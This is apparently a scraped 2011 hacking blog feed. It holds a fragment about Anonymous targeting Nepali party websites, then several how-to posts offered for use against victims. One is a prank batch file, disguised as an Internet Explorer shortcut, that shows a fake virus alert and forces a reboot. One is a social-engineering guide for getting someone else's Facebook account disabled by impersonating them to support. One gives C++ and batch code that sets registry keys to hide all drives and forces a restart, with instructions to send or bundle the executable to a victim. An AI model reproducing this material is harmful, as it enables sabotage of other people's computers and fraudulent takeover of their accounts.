</div><b style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><div style="text-align: center;"><span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: small; font-weight: normal;"><b style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;">Let’s analyze their next target sites and impact on them:</b></span><span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: small; font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"> </span></span></div></b><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><div style="text-align: center;">First – none of these sites have any useful information. Nither the government nor the citizen care if the sites go offline for a couple of days or weeks.</div></span><ul style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><li style="font: normal normal normal 11pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; text-align: center;">ucpnm.org (Maoist website – last two updates March 9 and April 26)</li>
<li style="font: normal normal normal 11pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; text-align: center;">nepalicongress.org (Nepali Congress website – Google has flagged it as Attack Page and they haven’t cared to correct the problem)</li>
<li style="font: normal normal normal 11pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; text-align: center;">cpnuml.org (CPN UML website – last two updates on Feb 17)</li>
<li style="font: normal normal normal 11pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; text-align: center;">mjfn.org (I couldn’t open it, even Google hasn’t indexed it – so couldn’t check the cache – I suspect it is not online at all)</li>
</ul><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><div style="text-align: center;">As you can see, these sites are mostly blogs. They post contents and don’t update the sites for months. Nobody relies in these sites for any works. These sites are only made to show their online presence. Most of the Nepali (including myself) don’t even know they existed before today.</div></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><div style="text-align: center;">A tentative traffic analysis of these sites. The biggest site, Anonymous choose to attack, is ranked almost 2000 in Nepal and it is ranked 1,667,960 worldwide. A month-old blog with a couple of posts can get over that rank in Alexa within a few months. Other websites are even worse.</div></span></div><div style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px; margin-top: 10px; text-align: right;"></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><br />
</span></div><div style="text-align: center;"><br />
</div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><div style="text-align: center;">Read more: <a href="http://www.mastinepal.com/showthread.php?t=48435#ixzz1N9esbnxH" style="color: #003399; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;">http://www.mastinepal.com/showthread.php?t=48435#ixzz1N9esbnxH</a></div></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-48352046401059803792011-05-03T03:25:00.000-07:002011-05-03T03:25:11.927-07:00How to make a facebook virus<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;">I heard from many of my friends that a virus is spreading on facebook which delete our accounts,I first thought it could have been a trojan that spread out,Then i found out that its just simple prank to shutdown <span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 0, 255) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana !important; font-size: 12px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">your pc</span>,Now today i will <span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 0, 255) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana !important; font-size: 12px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">show</span> you <span style="font-weight: bold;">how to make a facebook virus</span> to trick your friends<br />
In this tutorial I will show you <span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 0, 255) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana !important; font-size: 12px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">how to make a</span> Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .<span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="font-size: medium;"><br />
<a href="" name="more" style="color: #a46f38; text-decoration: none;"></a></span></span><b><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="font-size: medium;"><span style="color: #3d85c6;">Making a fake facebook virus!</span> </span></span></b><br />
<span class="fullpost" style="display: inline;"><br />
1) Open notepad<br />
2) Type this in :</span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><br />
</span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;">@echo off</span><br />
<span class="fullpost" style="display: inline;">msg * WARNING VIRUS DETECTED!!!!! AFTER 5 <span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 0, 255) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Helvetica, Arial !important; font-size: 12px !important; font-style: normal !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">MINUTES</span> YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!</span><br />
<span class="fullpost" style="display: inline;">PAUSE</span><br />
<span class="fullpost" style="display: inline;">shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."</span></span></span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;"><br />
</span></span></span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;"><br />
</span></span></span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-weight: normal; line-height: 19px;">3) Save it as <span style="font-weight: bold;">something.bat</span><br />
4)Right click on Internet Explorer .bat and click Create <span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 0, 255) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana !important; font-size: 12px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Shortcut</span><br />
5)Right click on shorcut and click Properties.<br />
6) Click Change Icon<br />
7.Choose Internet Explorer icon or similar , click OK , then click Apply<br />
<br />
Now your <span style="font-weight: bold;">facebook virus</span> is almost ready<br />
<br />
<br />
8).Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-weight: normal; line-height: 19px;"><br />
</span></span></span></span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnGrHNE-6BF8ylb_9uTyvYNpR6RCUMyOOwDIf5Uw2D5F-rywvQGhswfVipKfqUTuH46dHNEZZll6RI2ctx3D1gRzlYYR8z2t_-TlVXUKQQk4n1QJjETTTbYpj3s0ry1zGbNP09cRexMT0/s1600/facebook-virus1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnGrHNE-6BF8ylb_9uTyvYNpR6RCUMyOOwDIf5Uw2D5F-rywvQGhswfVipKfqUTuH46dHNEZZll6RI2ctx3D1gRzlYYR8z2t_-TlVXUKQQk4n1QJjETTTbYpj3s0ry1zGbNP09cRexMT0/s1600/facebook-virus1.jpg" /></a></div><span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-weight: normal; line-height: 19px;"><br />
</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19px;"><span class="fullpost" style="display: inline;"><span class="Apple-style-span" style="background-color: white; color: #666666; font-family: Helvetica, Arial; font-weight: bold; line-height: 15px;"><span class="fullpost" style="display: inline;"><br />
</span></span></span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-62672605273772876262011-04-27T01:18:00.000-07:002011-04-27T02:30:54.975-07:00How To Delete Someone Else Facebook Account<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #371301; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"></span><br />
<h3 class="post-title entry-title" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmfEU7E3BYN8Pi5JrFIZXbX44y0HAauOSpg8b7JufPJ3oFGPCecX-vd5pdFAqUcuQQE_55uhYnDp7Si2W5l0RDftp_4jZIKrKHR9yYNTKdgPPJwRV9UwkiomYQAmSFslBIWkimFRyJ1Ro/s1600/border.jpg); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; font: normal normal normal 34px/normal Georgia, Tahoma, Helvetica, FreeSans, sans-serif; letter-spacing: -2px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 25px; position: relative;"><a href="http://www.isoftdl.com/2011/03/how-to-delete-someone-else-facebook.html" style="color: #561d02; text-decoration: none;">How To Delete Someone Else Facebook Account</a></h3><div class="post-header" style="color: #535353; line-height: 1.6; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="post-header-line-1"></div></div><div class="post-body entry-content" style="font-size: 14px; line-height: 1.4; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; width: 550px;"><div dir="ltr" style="text-align: left;" trbidi="on"><span style="color: black; font-weight: bold;"><br />
<br />
</span><br />
<br />
<div style="color: black; font-weight: bold;"><i>This <span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: normal !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">tutorial</span> is education purpose only, once deleted <span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: italic !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">profile</span> can never be recovered.</i></div><div style="color: black; font-weight: bold;">This is an extreme example of Social Engineering technique, we need following things to do so.</div><div style="color: black; font-weight: bold;"><span id="more-7548"></span></div><ol style="color: black; font-weight: bold;"><li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">Victim’s profile link ( you can get it easily )</li>
<li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">His/Her Email which he/she uses to sign in</li>
<li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">His/Her birth date which he/she has used in <span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: italic !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">the profile</span></li>
<li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">Make <span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: normal !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">an Email</span> ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.</li>
</ol><a href="http://www.facebook.com/help/identify.php?show_form=hack_nologin_access" style="color: black; font-weight: bold; text-decoration: none;">Ckeck Out Here </a><br />
<br />
<span style="color: black; font-weight: bold;">Now you will get this screen</span><br />
<br />
<a alt="How to hack facebook account" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzEnwmmhlkIXEdetFtItJlfq8Ps9vpteloy_uSNA-BuXZuCqqAOTNvQHNyFhcBeU4-ubCzifPSOF_m7etfe3pCH0DTJyFX2aPyKLntzj__JHE1u6p8xoHF8HZQ8pOPTr9EtoI5c6PjvDM/s1600/fbd.jpg" rel="nofollow" style="color: black; font-weight: bold; text-decoration: none;"><img alt="How to hack facebook account" border="0" id="BLOGGER_PHOTO_ID_5580259119492724674" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzEnwmmhlkIXEdetFtItJlfq8Ps9vpteloy_uSNA-BuXZuCqqAOTNvQHNyFhcBeU4-ubCzifPSOF_m7etfe3pCH0DTJyFX2aPyKLntzj__JHE1u6p8xoHF8HZQ8pOPTr9EtoI5c6PjvDM/s200/fbd.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; cursor: pointer; display: block; height: 152px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; position: relative; text-align: center; width: 200px;" /></a><br />
<ul style="color: black; font-weight: bold; line-height: 1.4; list-style-image: initial; list-style-position: initial; list-style-type: disc; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px;"><li style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-color: initial; border-top-style: none; border-top-width: initial; border-width: initial; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email u created.</li>
<li style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-color: rgba(128, 128, 128, 0.496094); border-top-style: none; border-top-width: 1px; border-width: initial; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">You will get a email on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim’s name ) and you cant access your facebook account. Also you have lost access toyour Email Address associated with <span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: normal !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">the account</span>. You dont know what to do now. The hacker is coming online regularly and using <span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">your account</span>. If the victim is a girl also write ‘ I am a girl and it poses threat to my social life ‘ and write anything you want that could make them take action.</li>
<li style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-color: rgba(128, 128, 128, 0.496094); border-top-style: none; border-top-width: 1px; border-width: initial; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;">After 2-3 days youu will get a<br />
reply. They will again <span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">ask you</span> that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what <span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: normal !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">all you</span> wrote in first mail.</li>
<li style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-color: rgba(128, 128, 128, 0.496094); border-top-style: none; border-top-width: 1px; border-width: initial; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"><span class="IL_AD" id="IL_AD11" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Next Day</span> or Same Day you will get an Email that <span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 0, 255) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: blue; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px !important; font-style: normal !important; font-weight: bold !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">your account</span> is disabled.</li>
<div></div></ul></div></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-38631834661736013502011-04-27T00:45:00.000-07:002011-04-27T00:47:24.243-07:00C++ AND BATCH VIRUS CODES TO DISABLE HARDDISK<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;">C++ CODE</span></span></span><br />
<span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;">#include < windows.h ><br />
#include < fstream.h ><br />
#include < iostream.h ><br />
#include < string.h ><br />
#include < conio.h ><br />
int main()<br />
{<br />
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/<br />
<br />
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }</span></span> </span><br />
<div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;"><br />
</span></span> </span></div><div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;">Copy the above code and paste in notepad<br />
Save the file with .cpp extension<br />
Compile and create .exe file in cpp<br />
Note:<br />
Don't run this c++ program ,it will attack your system itself.<br />
Copy the created .exe file and send it to your victim. You can also attach it with any other<br />
exe files.</span></span></span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;"><br />
</span></span> </span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;">BATCH CODE.</span></span></span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;">REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n<br />
<br />
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n<br />
<br />
shutdown -r -c \"Sorry Your System is hacked by us!\" -f</span></span><span class="Apple-style-span" style="background-color: #3d85c6;"> </span></span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;"><br />
</span></span><span class="Apple-style-span" style="background-color: #3d85c6;"> </span></span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 15px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="color: red;"><span class="Apple-style-span" style="background-color: #3d85c6;">I think this code will simple for non c++ programmers. It is easy to create the batch file also.<br />
Copy the above code to notepad.<br />
Save it with .bat extension (for ex: nodrivevirus.bat)<br />
Send the file to your victim</span></span></span></span></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-55527832926985913902011-04-27T00:39:00.000-07:002011-04-27T00:39:45.418-07:00Hacking Autorun.inf virus attack|Is autorun.inf virus?<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 18px;"></span><br />
<h3 class="post-title entry-title" style="color: #444444; font-family: Georgia, 'Times New Roman'; font-size: 18px; font-weight: normal; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 10px;">Hacking Autorun.inf virus attack|Is autorun.inf virus?</h3><div class="post-header"><div class="post-header-line-1"></div></div><div class="post-body entry-content" style="line-height: 1.6em; margin-bottom: 0.75em; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="float: right; margin-left: 10px;"><div class="addthis_toolbox addthis_default_style "><a class="addthis_button_compact at300m" href="http://www.addthis.com/bookmark.php?v=250&username=xa-4d0b61e94327a262" style="color: #a91b33; cursor: pointer; float: left; padding-bottom: 0px; padding-left: 2px; padding-right: 2px; padding-top: 0px; text-decoration: none;"><span class="at300bs at15nc at15t_compact" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s7.addthis.com/static/r07/widget29.png); background-origin: initial; background-position: 0px -3376px; background-repeat: no-repeat no-repeat; cursor: pointer; display: block; float: left; height: 16px; line-height: 16px; margin-right: 4px; overflow-x: hidden; overflow-y: hidden; width: 16px;"></span>Share</a><div class="atclear" style="clear: both;"></div></div></div><div dir="ltr" style="text-align: left;" 